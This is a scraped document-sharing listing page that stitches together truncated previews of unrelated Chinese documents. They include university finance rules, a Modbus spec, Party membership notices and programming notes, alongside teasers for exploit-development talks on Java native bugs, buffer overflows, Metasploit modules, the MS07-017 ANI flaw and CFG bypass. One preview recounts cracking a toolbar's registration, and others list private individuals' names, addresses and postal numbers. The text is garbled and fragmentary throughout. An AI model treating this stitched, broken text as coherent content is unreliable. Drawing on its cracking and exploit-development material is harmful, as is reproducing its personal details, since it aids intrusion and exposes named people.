<4D6963726F736F667420576F7264202D203230313330383136D6D0B9FAB5D8D6CAB4F3D1A7BFC6D1D0BEADB7D1D3D0B9D8D6C6B6C82D48442E646F63> 中 国 地 质 大 学 ( 北 京 ) 关 于 进 一 步 规 范 科 研 行 为 的 意 见... 1 中 国 地 质 大 学 ( 北 京 ) 关 于 进 一 步 加 强 科 研 经 费 会 计 核 算 管 理 的 有 关 规 定 5 中 国 地 质 大 学 ( 北 京 ) 科 研 经 费 审 计 实 施 办 法... 8 中 国 地 质 大 学 ( 北 京 ) 科 研 经 费 管 理 办 法...

More information

/ / (FC 3)...

/ / (FC 3)... Modbus/TCP 1.0 1999 3 29 Andy Swales Schneider aswales@modicon.com ... 2 1.... 3 2.... 3 2.1.. 3 2.2..4 2.3..4 2.4... 5 3.... 5 3.1 0... 5 3.2 1... 5 3.3 2... 6 3.4 / /... 7 4.... 7 5.... 8 5.1 0... 9

More information

要 及 时 为 入 党 积 极 分 子 确 定 两 名 培 养 联 系 人, 进 行 联 络 帮 助 要 定 期 ( 每 季 度 至 少 一 次 ) 听 取 培 养 联 系 人 的 思 想 和 工 作 情 况 汇 报, 及 时 完 成 入 党 积 极 分 子 登 记 表 ( 见 附 件 2) 的 填

要 及 时 为 入 党 积 极 分 子 确 定 两 名 培 养 联 系 人, 进 行 联 络 帮 助 要 定 期 ( 每 季 度 至 少 一 次 ) 听 取 培 养 联 系 人 的 思 想 和 工 作 情 况 汇 报, 及 时 完 成 入 党 积 极 分 子 登 记 表 ( 见 附 件 2) 的 填 中 共 兰 州 资 源 环 境 职 业 技 术 学 院 委 员 会 文 件 兰 资 环 院 党 发 2016 40 号 关 于 进 一 步 规 范 党 员 发 展 工 作 和 从 严 管 理 党 员 的 通 知 各 系 党 总 支 支 部 : 为 进 一 步 规 范 和 加 强 发 展 党 员 工 作, 从 严 管 理 党 员, 确 保 发 展 党 员 质 量, 提 高 各 基 层 党 组 织 的

More information

CC213

CC213 : (Ken-Yi Lee), E-mail: feis.tw@gmail.com 49 [P.51] C/C++ [P.52] [P.53] [P.55] (int) [P.57] (float/double) [P.58] printf scanf [P.59] [P.61] ( / ) [P.62] (char) [P.65] : +-*/% [P.67] : = [P.68] : ,

More information

1 CPU interrupt INT trap CPU exception

1 CPU interrupt INT trap CPU exception 1 CPU interrupt INT trap CPU exception 2 X86 CPU gate 64 16 1 2 5 8 16 16 P DPL 00101 TSS 101 DPL P 1 64 16 1 2 1 1 3 3 5 16 16 16 P DPL 0 D 000 16 110 111 100 D 1=32 0=16 DPL P 1 INT DPL1>=CPL>=DPL CPU

More information

untitled

untitled 8086/8088 CIP /. 2004.8 ISBN 7-03-014239-X.... TP313 CIP 2004 086019 16 100717 http://www.sciencep.com * 2004 8 2004 8 1 5 500 787 1092 1/16 16 1/2 391 000 1 2 ii 1 2 CAI CAI 3 To the teacher To the student

More information

Slide 1

Slide 1 1 分钟用 Java 原生层漏洞搞定 Win7+JRE7 一个漏洞, 三种利用 今天我们不会讲如何挖掘 Java 原生 层漏洞, 而是讲如何 料理 它们 自我介绍 趋势科技中国研发中心, 架构师 研究方向包括 漏洞挖掘, 沙盒技术, APT 攻击解决方案 重度动漫宅 议程 背景介绍 今天要使用的漏洞 Exploit 方法 1 Exploit 方法 2 Exploit 方法 3 总结 何为 Java

More information

linux 下的缓冲区溢出 裴士辉 QQ:

linux 下的缓冲区溢出 裴士辉 QQ: linux 下的缓冲区溢出 裴士辉 QQ:1628159305 Buffer Overflows 缓冲区溢出攻击 基本的思想通过修改某些内存区域, 把一段恶意代码存储到一个 buffer 中, 并且使这个 buffer 被溢出, 以便当前进程被非法利用 ( 执行这段恶意的代码 ) 2 危害性 在 UNIX 平台上, 通过发掘 Buffer Overflow, 可以获得一个交互式的 shell 在 Windows

More information

Microsoft Word - “调戏”反遭“反调戏”—记Visual Toolbar 的破解过程.doc

Microsoft Word - “调戏”反遭“反调戏”—记Visual Toolbar 的破解过程.doc 调戏 反遭 反调戏 记 Visual Toolbar 的破解过程 cntrump 由于要做工具栏, 在网上找到了 Visual Toolbar 这个工具, 看了介绍挺不错的, 下载回 来之后发现软件要注册, 但是这是个 04 年的软件, 已经没法向作者购买了, 更重要的原因 是俺还在失业中, 吃饭都成问题了, 哪里还有钱注册呀 ~~ 用 PEID 检测是 UPX 的老壳, 直接手脱, 过程不是重点反正能脱壳就行了

More information

BOOL EnumWindows(WNDENUMPROC lparam); lpenumfunc, LPARAM (Native Interface) PowerBuilder PowerBuilder PBNI 2

BOOL EnumWindows(WNDENUMPROC lparam); lpenumfunc, LPARAM (Native Interface) PowerBuilder PowerBuilder PBNI 2 PowerBuilder 9 PowerBuilder Native Interface(PBNI) PowerBuilder 9 PowerBuilder C++ Java PowerBuilder 9 PBNI PowerBuilder Java C++ PowerBuilder NVO / PowerBuilder C/C++ PowerBuilder 9.0 PowerBuilder Native

More information

馬偕醫學院 學生事務工作簡報

馬偕醫學院 學生事務工作簡報 馬 偕 醫 學 院 總 務 處 簡 介 報 告 人 申 永 順 總 務 長 總 務 處 織 與 成 員 許 鎂 秀 曾 柏 壽 楊 嘉 華 吳 俊 仲 內 容 校 園 環 境 生 活 機 能 二 期 工 程 配 合 事 項 馬 偕 醫 學 院 一 期 校 園 簡 介 網 球 場 籃 / 排 球 場 三 芝 區 市 中 心 教 學 大 樓 5C 聯 合 行 政 辦 公 區 A 區 B 區 C 區 藝

More information

38 47995529 威 福 髮 藝 店 桃 園 市 蘆 竹 區 中 山 里 福 祿 一 街 48 號 地 下 一 樓 50,000 獨 資 李 依 純 105/04/06 府 經 登 字 第 1059003070 號 39 47995534 宏 品 餐 飲 桃 園 市 桃 園 區 信 光 里 民

38 47995529 威 福 髮 藝 店 桃 園 市 蘆 竹 區 中 山 里 福 祿 一 街 48 號 地 下 一 樓 50,000 獨 資 李 依 純 105/04/06 府 經 登 字 第 1059003070 號 39 47995534 宏 品 餐 飲 桃 園 市 桃 園 區 信 光 里 民 1 08414159 惠 鴻 眼 鏡 行 桃 園 市 中 壢 區 福 德 里 中 華 路 一 段 186 號 1 樓 30,000 獨 資 宋 耀 鴻 105/04/27 府 經 登 字 第 1059003866 號 2 17891110 承 元 冷 氣 空 調 工 程 行 桃 園 市 桃 園 區 中 德 里 國 際 路 1 段 98 巷 50 號 2 樓 之 4 200,000 獨 資 詹 安 平

More information

一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 (

一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 ( 浙 江 大 学 2016 年 部 门 预 算 2016 年 5 月 1 一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 ( 三 ) 支 出 总 表 说 明

More information

目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年

目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年 中 南 大 学 2016 年 部 门 预 算 二 一 六 年 五 月 1 目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年 预 算 情 况 说 明 (

More information

信息参考

信息参考 内 部 资 料 注 意 保 密 信 息 参 考 2016 年 第 1 期 ( 总 第 26 期 ) 党 政 办 公 室 编 2016 年 2 月 29 日 工 作 要 点 教 育 部 2016 年 工 作 要 点 (1) 中 共 北 京 市 委 教 育 工 作 委 员 会 北 京 市 教 育 委 员 会 北 京 市 人 民 政 府 教 育 督 导 室 2015 年 工 作 要 点 (10) 中 共

More information

Microsoft Word - 15dbtb007

Microsoft Word - 15dbtb007 第 7 期 中 共 浙 江 大 学 委 员 会 办 公 室 2015 年 12 月 16 日 按 :2015 年 12 月 15 日, 学 校 召 开 了 2015 年 党 建 工 作 会 议, 党 委 书 记 金 德 水 同 志 作 出 重 要 讲 话, 深 刻 分 析 了 学 校 改 革 发 展 面 临 的 形 势, 对 加 强 和 改 进 学 校 党 的 建 设 进 行 了 部 署, 对 充

More information

海 南 冯 琳 峰 海 南 省 锅 炉 压 力 容 器 与 特 种 设 备 检 验 所 海 南 省 定 安 县 白 蒙 路 47 号 570203 信 XC22043618311 内 蒙 古 冯 磊 赤 峰 市 特 种 设 备 检 验 所 内 蒙 古 赤 峰 市 红 山 区 八 里 铺 油 库 路

海 南 冯 琳 峰 海 南 省 锅 炉 压 力 容 器 与 特 种 设 备 检 验 所 海 南 省 定 安 县 白 蒙 路 47 号 570203 信 XC22043618311 内 蒙 古 冯 磊 赤 峰 市 特 种 设 备 检 验 所 内 蒙 古 赤 峰 市 红 山 区 八 里 铺 油 库 路 2015 年 容 器 检 验 员 取 证 邮 寄 证 书 查 询 邮 寄 日 期 2016.2.26 查 询 网 址 http://yjcx.chinapost.com.cn/zdxt/yjcx/ 省 份 姓 名 工 作 单 位 通 信 地 址 邮 政 编 码 挂 号 号 码 山 东 丁 宪 振 山 东 省 特 种 设 备 检 验 研 究 院 山 东 省 济 南 市 高 新 区 天 辰 大 街 939

More information

42 2141601026 2016 11 27 2 1.1............................................. 2 1.2....................................... 2 1.2.1......................................... 2 1.3.............................................

More information

Guava学习之Resources

Guava学习之Resources Resources 提供提供操作 classpath 路径下所有资源的方法 除非另有说明, 否则类中所有方法的参数都不能为 null 虽然有些方法的参数是 URL 类型的, 但是这些方法实现通常不是以 HTTP 完成的 ; 同时这些资源也非 classpath 路径下的 下面两个函数都是根据资源的名称得到其绝对路径, 从函数里面可以看出,Resources 类中的 getresource 函数都是基于

More information

Microsoft PowerPoint - 从漏洞到利用代码为Metasploit写_cn.ppt

Microsoft PowerPoint - 从漏洞到利用代码为Metasploit写_cn.ppt 从漏洞到利用代码为 Metasploit 写插件 Saumil Shah 本人简介 # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash Saumil Shah - krafty ceo, net-square

More information

浙江大学本科论文模板

浙江大学本科论文模板 本 科 生 毕 业 设 计 报 告 项 目 名 称 微 型 操 作 系 统 的 设 计 与 实 现 姓 名 与 学 号 曲 国 铖 3063027053 指 导 老 师 王 新 宇 专 业 计 算 机 科 学 与 技 术 学 院 计 算 机 学 院 A Dissertation Submitted to Zhejiang University for the Degree of Bachelor of

More information

动画光标文件(

动画光标文件( Ms07-017 动画光标文件 (.Ani) 漏洞分析 neinei/2007-4-8 一 漏洞描述 : Microsoft Windows 在处理动画光标文件 (.ani) 时没有正确地验证 ANI 头中所指定的大小, 导致栈溢出漏洞 恶意攻击者可以在网页中嵌入相关脚本, 在用户浏览网页时会执行伪造的.ani 文件, 或者用户打开了恶意的邮件消息, 都会触发这个溢出, 导致执行任意代码 该文件 (.ani)

More information

(Load Project) (Save Project) (OffLine Mode) (Help) Intel Hex Motor

(Load Project) (Save Project) (OffLine Mode) (Help) Intel Hex Motor 1 4.1.1.1 (Load) 14 1.1 1 4.1.1.2 (Save) 14 1.1.1 1 4.1.2 (Buffer) 16 1.1.2 1 4.1.3 (Device) 16 1.1.3 1 4.1.3.1 (Select Device) 16 2 4.1.3.2 (Device Info) 16 2.1 2 4.1.3.3 (Adapter) 17 2.1.1 CD-ROM 2 4.1.4

More information

(A) 二 小 時 (B) 三 小 時 (C) 四 小 時 (D) 五 小 時 第 一 組 出 題 6. 若 對 於 收 到 的 交 通 違 規 罰 單 不 服, 在 收 到 罰 單 幾 日 內 須 向 警 察 機 關 或 監 理 機 關 申 訴? (A) 十 天 (B) 十 五 天 (C) 二 十

(A) 二 小 時 (B) 三 小 時 (C) 四 小 時 (D) 五 小 時 第 一 組 出 題 6. 若 對 於 收 到 的 交 通 違 規 罰 單 不 服, 在 收 到 罰 單 幾 日 內 須 向 警 察 機 關 或 監 理 機 關 申 訴? (A) 十 天 (B) 十 五 天 (C) 二 十 1. 依 據 強 制 執 行 法 第 28-2 條 第 1 項 規 定, 執 行 標 的 金 額 或 價 額 未 滿 新 台 幣 五 千 元 者, 免 徵 執 行 費 ; 新 台 幣 五 千 元 以 上 者, 則 以 多 少 計 算? (A) 千 分 之 八 (B) 千 分 之 一 (C) 千 分 之 五 (D) 千 分 之 十 2. 何 種 票 據 可 直 接 向 法 院 聲 請 裁 定 後 強

More information

untitled

untitled Lwip Swedish Institute of Computer Science February 20, 2001 Adam Dunkels adam@sics.se (QQ: 10205001) (QQ: 329147) (QQ:3232253) (QQ:3232253) QQ ARM TCPIP LCD10988210 LWIP TCP/IP LWIP LWIP lwip API lwip

More information

游戏厅捕鱼技巧_天天酷跑游戏技巧 2048游戏技巧,游戏厅打鱼技巧_

游戏厅捕鱼技巧_天天酷跑游戏技巧 2048游戏技巧,游戏厅打鱼技巧_ 游 戏 厅 捕 鱼 技 巧 _ 天 天 酷 跑 游 戏 技 巧 巧 _ 2048 游 戏 技 巧, 游 戏 厅 打 鱼 技 152 http://www.500630.com 游 戏 厅 捕 鱼 技 巧 _ 天 天 酷 跑 游 戏 技 巧 2048 游 戏 技 巧, 游 戏 厅 打 鱼 技 巧 _ 现 在 拦 截 api 游 戏 厅 打 鱼 技 巧 的 教 程 到 处 都 是, 我 就 不 列 举

More information

untitled

untitled MODBUS 1 MODBUS...1 1...4 1.1...4 1.2...4 1.3...4 1.4... 2...5 2.1...5 2.2...5 3...6 3.1 OPENSERIAL...6 3.2 CLOSESERIAL...8 3.3 RDMULTIBIT...8 3.4 RDMULTIWORD...9 3.5 WRTONEBIT...11 3.6 WRTONEWORD...12

More information

幻灯片 1

幻灯片 1 3 8086 Tel:2656809 tjx@csu.edu.cn 2005-9-14 1 2005-9-14 2 8086 8 8086 8086 7 2005-9-14 3 PC 2005-9-14 4 2005-9-14 5 81616 2005-9-14 6 [ ] MOV AX, 3064H AX=3064H 16AX OP 64H 30H 2005-9-14 7 16 AX BX CX

More information

Microsoft Word - 正文.doc

Microsoft Word - 正文.doc 1 2 1 2 3 4 5 6 7 8 9 10 3 1 150 2 150 1 1 1.1 1.1.1 1.2 1.2.1 1.2.2 1.2.3 1.3 1.3.1 1.3.2 1.4 1.4.1 CPU 1.4.2 I/O 1.4.3 I/O 1.5 1.5.1 CISC RISC 1.5.2 1.5.3 1.6 1.6.1 1.6.2 N 1.6.3 2 2.1 2.1.1 2.1.2 2.1.3

More information

-------------------------------------------------------------------------------- 01 02 03 04 05 06 07 08 09 10 11 12 !???? 116 ?! --------------------------------------------------------------------------------

More information

秘密

秘密 錯 魂 記 歌 仔 戲 劇 本 劇 情 簡 介 義 明 雅 蓮 夫 妻 膝 下 無 子, 養 育 年 齡 差 距 甚 大 的 小 妹 慧 君, 他 們 都 熱 愛 南 管 音 樂, 而 台 南 城 的 南 管 秋 祭 大 會 將 近, 這 三 人 所 屬 的 館 閣 雅 音 齋 也 正 加 緊 練 習, 希 望 能 在 秋 祭 大 會 中 奪 得 頭 彩 某 日 姑 嫂 兩 人 出 門 行 香, 天

More information

E11701

E11701 編 輯 推 薦 無 悔 付 出 的 勇 氣 身 邊 是 不 是 有 這 樣 的 人, 總 將 自 己 的 需 求 放 在 最 後, 為 了 所 愛 的 人 無 怨 無 悔 付 出? 以 前 小 編 總 覺 得 這 樣 的 人 很 偉 大 也 很 傻, 怎 麼 能 將 自 己 的 一 切 全 部 投 入 毫 不 保 留? 或 許 是 因 為 見 到 身 邊 朋 友 為 了 愛 情 義 無 反 顧, 明

More information

untitled

untitled 露 年 老 女 兩 留 兩 離 不 不 不 料 車 不 料 來 1. 22 年 讀 律 說 2. 女 20 老 女 麗 3. 45 老 論 4. 林 女 43 見 識 女 5. 45 來 老 6. 女 20 女 7. 劉 女 45 利 說 8. 60 9. 50 良 10. 50 11. 45 12. 45 露 1 13. 老 14. 里 50 兩 L 不 1 : L L 切 2 1 切 泥 留 露

More information

ISA-9620用户手册.PDF

ISA-9620用户手册.PDF ISA-9620 CAN v1.0 2004 01 08-1 - -------------------------------------------------------1 -------------------------------------------------------1 -------------------------------------------------------1

More information

Microsoft Word - 1-3陳詠琳-近代..

Microsoft Word - 1-3陳詠琳-近代.. 近 代 數 字 卦 研 究 考 述 陳 詠 琳 摘 要 所 謂 的 數 字 卦, 乃 指 出 土 文 物 上 某 種 奇 特 的 卜 筮 符 號, 有 學 者 表 示 這 些 符 號 為 數 字, 並 將 之 與 周 易 連 結, 遂 使 此 類 符 號 有 筮 數 易 卦 之 稱, 為 一 門 新 穎 的 易 學 研 究 議 題 張 政 烺 以 奇 數 為 陽, 偶 數 為 陰 的 原 則, 把

More information

(Microsoft Word - \244g\246a\247B\244\275\253H\245\365\244\247\275\325\254d\254\343\250s100.1.26doc)

(Microsoft Word - \244g\246a\247B\244\275\253H\245\365\244\247\275\325\254d\254\343\250s100.1.26doc) 48,1979, 第 一 章 緒 論 註 根 據 禮 記 郊 特 牲 : 國 中 之 神, 莫 貴 於 社 又 禮 記 月 令 篇 : 命 民 社, 土 : 正 曰 社 后, 土 后 地 共, 工 使 氏 民 有 祀 子 焉 曰 句 龍 又 第, 疏 一 為 : 后 土, 即 社 神 也 左 傳 : 社 稷 五 祀, 節 后 土 研 究 后 動 機 者 所 以 有 社 稷 何? 為 天 下 求 福

More information

res/layout 目录下的 main.xml 源码 : <?xml version="1.0" encoding="utf 8"?> <TabHost android:layout_height="fill_parent" xml

res/layout 目录下的 main.xml 源码 : <?xml version=1.0 encoding=utf 8?> <TabHost android:layout_height=fill_parent xml 拓展训练 1- 界面布局 1. 界面布局的重要性做应用程序, 界面是最基本的 Andorid 的界面, 需要写在 res/layout 的 xml 里面, 一般情况下一个 xml 对应一个界面 Android 界面布局有点像写 html( 连注释代码的方式都一样 ), 要先给 Android 定框架, 然后再在框架里面放控件,Android 提供了几种框架,AbsoluteLayout,LinearLayout,

More information

1873 1939 1937 1981 1900 1870 1902 1899 1902 1901 1899 1868 1868 1829 1905 1859 1943 1860 1900 1887 1878 1820 1903 1834 1906 1856 1836 1884 1787

More information

1868 1868 1829 1905 1859 1943 1860 1900 1887 1878 1820 1903 1834 1906 1856 1836 1884 1787 18411827 1843 1890 1884 1904 1845

More information

2015 度 第 2 期 批 量 集 中 询 价 采 购 项 目 包 组 A1 台 式 计 算 机 ( 配 置 一 ) 采 购 人 信 息 及 采 购 数 量 序 号 单 位 编 码 采 购 单 位 配 送 地 址 368 1104000 14 171009 广 东 省 交 通 运 输 高 级 技

2015 度 第 2 期 批 量 集 中 询 价 采 购 项 目 包 组 A1 台 式 计 算 机 ( 配 置 一 ) 采 购 人 信 息 及 采 购 数 量 序 号 单 位 编 码 采 购 单 位 配 送 地 址 368 1104000 14 171009 广 东 省 交 通 运 输 高 级 技 2015 度 第 2 期 批 量 集 中 询 价 采 购 项 目 包 组 A1 台 式 计 算 机 ( 配 置 一 ) 采 购 人 信 息 及 采 购 数 量 序 号 单 位 编 码 采 购 单 位 配 送 地 址 368 1104000 1 140002 广 东 女 子 职 业 技 术 学 院 2 149001 广 东 警 官 学 院 1 3000 3 156002 南 方 医 科 大 学 2 6000

More information

提纲 1 2 OS Examples for 3

提纲 1 2 OS Examples for 3 第 4 章 Threads2( 线程 2) 中国科学技术大学计算机学院 October 28, 2009 提纲 1 2 OS Examples for 3 Outline 1 2 OS Examples for 3 Windows XP Threads I An Windows XP application runs as a seperate process, and each process may

More information

易语言逆向分析

易语言逆向分析 易语言介绍 易语言功能强大, 具有多个支持库, 可以很快的进行产品开发 与其它语言相比, 学习难度也低一些, 目前很多的外 挂程序, 核心功能编写为动态链接库, 界面开发的工作会使用易语言来进行 易语言编写的程序, 最终的功能实现, 还是需要调用系统的动态链接库 我对易语言的理解是对系统动态库中常用的 功能进行了一次封装, 使其使用起来更加方便简单 由于易语言本身带有多个支持库, 使用我们的逆向分析变得困难重重

More information

untitled

untitled XZL024 http://item.taobao.com/item.htm?id=6321822194 1 1 1.1 1.2 1.3 1.4 2 2.1 2.2 2.3 3 USBee Suite 3.1 3.2 3.3 3.4 4 RS232 RS485 RS422 CAN http://item.taobao.com/item.htm?id=6321822194 2 1 XZL024 PC

More information

使用!pvefindaddr 更容易的开发漏洞利用

使用!pvefindaddr 更容易的开发漏洞利用 翻译题目 : 使用!pvefindaddr 更容易的开发漏洞利用 Exploit Writing Made Easier With!pvefindaddr 作者 : 仙果主页 :http://hi.baidu.com/zhanglinguo11 版权提示 : 文章版权归作者所有, 转载请注明出处, 尊重作者劳动成果 题记 : 看雪上好像没有专门介绍 Immunity Debugger 的!pvefindaddr

More information

2015年全国射箭重点学校锦标赛.xls

2015年全国射箭重点学校锦标赛.xls 60(1) 60(2) 50 30 10's X's 60(1) 60(2) 50 30 10's X's 1 2 3 4 5 6 10's X's 40A 41A 40C 42A 43C 38C 46B 40B 46C 45B 41C 37C 43A 37B 39C 41B 1 2 3 4 5 6 10's X's 44B 44A 42B 45A 38B 43B 38A 39B 37A 42C 46A

More information

2015年全国射箭冠军赛.xls

2015年全国射箭冠军赛.xls 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 10's X's 70(1-1) 70(1-2)

More information

2017年全国射箭重点体校锦标赛.xls

2017年全国射箭重点体校锦标赛.xls 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2 50 30 10's X's 70 170 2

More information

2015年全国室外射箭锦标赛.xls

2015年全国室外射箭锦标赛.xls 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 70(2-1) 70(2-2) 10's X's 70(1-1) 70(1-2) 10's X's 70(1-1) 70(1-2)

More information

Important Notice SUNPLUS TECHNOLOGY CO. reserves the right to change this documentation without prior notice. Information provided by SUNPLUS TECHNOLO

Important Notice SUNPLUS TECHNOLOGY CO. reserves the right to change this documentation without prior notice. Information provided by SUNPLUS TECHNOLO Car DVD New GUI IR Flow User Manual V0.1 Jan 25, 2008 19, Innovation First Road Science Park Hsin-Chu Taiwan 300 R.O.C. Tel: 886-3-578-6005 Fax: 886-3-578-4418 Web: www.sunplus.com Important Notice SUNPLUS

More information

FY.DOC

FY.DOC 高 职 高 专 21 世 纪 规 划 教 材 C++ 程 序 设 计 邓 振 杰 主 编 贾 振 华 孟 庆 敏 副 主 编 人 民 邮 电 出 版 社 内 容 提 要 本 书 系 统 地 介 绍 C++ 语 言 的 基 本 概 念 基 本 语 法 和 编 程 方 法, 深 入 浅 出 地 讲 述 C++ 语 言 面 向 对 象 的 重 要 特 征 : 类 和 对 象 抽 象 封 装 继 承 等 主

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_04.ppt

Microsoft PowerPoint - C15_LECTURE_NOTE_04.ppt MACHINE LANGUAGE CODING AND THE DEBUG SOFTWARE DEVELOPMENT PROGRAM OF THE PC General instruction format for machine code 611 37100 微處理機原理與應用 Lecture 04-4 MACHINE LANGUAGE CODING AND THE DEBUG SOFTWARE

More information

目 录 1 正 文 乊 前... 5 1.1 目 癿... 5 1.2 本 文 内 容... 5 1.3 声 明... 5 2 字 符 编 码 相 兰 癿 背 景 知 识... 6 2.1 拉 丁 字 母... 6 2.2 什 么 是 字 符 编 码... 6 3 字 符 编 码 标 准... 8

目 录 1 正 文 乊 前... 5 1.1 目 癿... 5 1.2 本 文 内 容... 5 1.3 声 明... 5 2 字 符 编 码 相 兰 癿 背 景 知 识... 6 2.1 拉 丁 字 母... 6 2.2 什 么 是 字 符 编 码... 6 3 字 符 编 码 标 准... 8 关 键 字 字 符 编 码 详 解 版 本 : 1.0 作 者 : crifan 邮 箱 : green-waste (at)163.com 字 符 编 码,ASCII,ISO 8859,ISO 10646,UCS,Unicode,UTF-8 版 本 版 本 日 期 内 容 更 新 1.0 2011-11-02 添 加 了 编 码 相 兰 背 景 知 识 仃 绉 添 加 了 ASCII 和 EASCII

More information

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的方法, 并配合微软修复了这一问题 背景 FG 是微软在 Windows 10 技术预览 C版与 Windows

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_04.ppt

Microsoft PowerPoint - C15_LECTURE_NOTE_04.ppt MACHINE LANGUAGE CODING AND THE DEBUG SOFTWARE DEVELOPMENT PROGRAM OF THE PC MACHINE LANGUAGE CODING AND THE DEBUG SOFTWARE DEVELOPMENT PROGRAM OF THE PC 4.1 Converting Assembly Language Instructions to

More information

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9 在 WINDBG 中定位 ExceptionAddress 核心技术部陈庆 关键字 : 调试异常 windbg second chance ExceptionAddress 摘要 : 在 windbg 中调试时, 碰上 second chance 时, 栈回溯已经看不到与 ExceptionAddress 直接相关的信息, 但我们调试的目的就是要找到 ExceptionAddress 本文介绍了几种通用思路来解决这个问题

More information

Untitled

Untitled Exploit 1500 writeup 0x00 概述 这道题整个 Pwn 的过程包含了很多个步骤, 把每 一项分解开来不算很难, 但是合在 一起还是 比较 麻烦的 下 面就简单地整理 一下这整个 Exploit 的过程 Operation System Windows XP SP3 Archtechture x86-32 Tools Ollydbg IDA Pro 6.6.text 0x400000

More information

科学计算的语言-FORTRAN95

科学计算的语言-FORTRAN95 科 学 计 算 的 语 言 -FORTRAN95 目 录 第 一 篇 闲 话 第 1 章 目 的 是 计 算 第 2 章 FORTRAN95 如 何 描 述 计 算 第 3 章 FORTRAN 的 编 译 系 统 第 二 篇 计 算 的 叙 述 第 4 章 FORTRAN95 语 言 的 形 貌 第 5 章 准 备 数 据 第 6 章 构 造 数 据 第 7 章 声 明 数 据 第 8 章 构 造

More information

<4D6963726F736F667420576F7264202D20C7B6C8EBCABDCFB5CDB3C9E8BCC6CAA6B0B8C0FDB5BCD1A75FD1F9D5C22E646F63>

<4D6963726F736F667420576F7264202D20C7B6C8EBCABDCFB5CDB3C9E8BCC6CAA6B0B8C0FDB5BCD1A75FD1F9D5C22E646F63> 因 为 路 过 你 的 路, 因 为 苦 过 你 的 苦, 所 以 快 乐 着 你 的 快 乐, 追 逐 着 你 的 追 逐 内 容 简 介 本 书 根 据 2005 年 下 半 年 实 施 的 全 国 计 算 机 技 术 与 软 件 专 业 技 术 资 格 ( 水 平 ) 考 试 嵌 入 式 系 统 设 计 师 级 考 试 大 纲 精 神, 在 深 入 研 究 历 年 计 算 机 技 术 与 软

More information

● 源起

● 源起 1 Hot Potatoes Version 6 2 Hot Potatoes LTTC Hot Potatoes 3 Hot Potatoes UVic Clipart Galleries 4 Hot Potatoes Hot Potatoes Version 6 Tutorial JCloze Hot Potatoes Version 6 Tutorial JMatch 5 Hot Potatoes

More information

<4D F736F F D D342DA57CA7DEA447B14D2DA475B57BBB50BADEB27AC3FEB14DA447B8D5C344>

